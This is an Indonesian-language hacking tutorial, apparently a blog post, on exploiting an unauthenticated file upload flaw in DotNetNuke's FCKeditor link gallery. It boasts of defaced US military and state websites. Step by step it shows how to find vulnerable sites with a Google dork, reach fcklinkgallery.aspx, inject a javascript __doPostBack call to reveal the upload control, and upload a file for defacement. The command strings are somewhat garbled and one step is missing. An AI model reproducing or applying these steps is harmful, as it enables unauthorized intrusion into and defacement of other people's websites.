Peretasan portal,ditemukan bug oleh peneliti iran.DNN galeri semua versi upload file jarak jauh tanpa otentikasi,Bug ini di temukan oleh Alireza Afzali tim ISCN pada tanggal 2008/05/5.

Lebih dari 10 situs web milliter dan 20 negara bagian United States Of American Defaced oleh lidah bug ini.

- Temukan jalur DNN lalu buka file ini

  kode : /providers/HtmlEditorProviders/fck/fcklinkgallery.aspx

- pilih file (A File di situs anda)

- setelah membuat kemudian letakan kode ini sebagai gantinya URL

  kode : javascript:_doPostBack (ctlURL $ cmdUpload;")

- sekarang kmu melihat people,pilih foolder root dan kmu akan di unggah ke file situs/jalur dnn/prtal/0

berikut adalah cara meretas situs dari portal

langkah pertama

mskan dork : inurl:/tabid/36/language/en-US/default.aspx

kode: portal/0/ (ini adalah dork untuk menemukan situs portal vuln)

langkah kedua

-U akan menemukan banyak situs,plih situs yg nyaman bagi kmu.

langkah ketiga

sekarang ganti kode : /home/tabid/36/language/en-US/Default.aspx dengan kode : /providers/HtmlEditorProviders/fck/fcklinkgallery.aspx

langkah keempat

anda akan mendapatkan halaman link gallery

langkah kelima

jangan lakukan apapun untuk saat ini,PENDEKATAN PENDEK FINAL

langkah keenam

sekarang gantu URL dibilah alamat dgn sikap sederhana

kode : javascript:_doPostBack ('ctlURL $ cmdUpload',")

langkah ketujuh

anda akan menemukan opsi browser dan upload

langkah kesembilan

upload paket anda

langkah terakhir

pergi ke http://www.sitetarget,com/portal/0/paket anda

sekian dari nisa semoga bermanfaat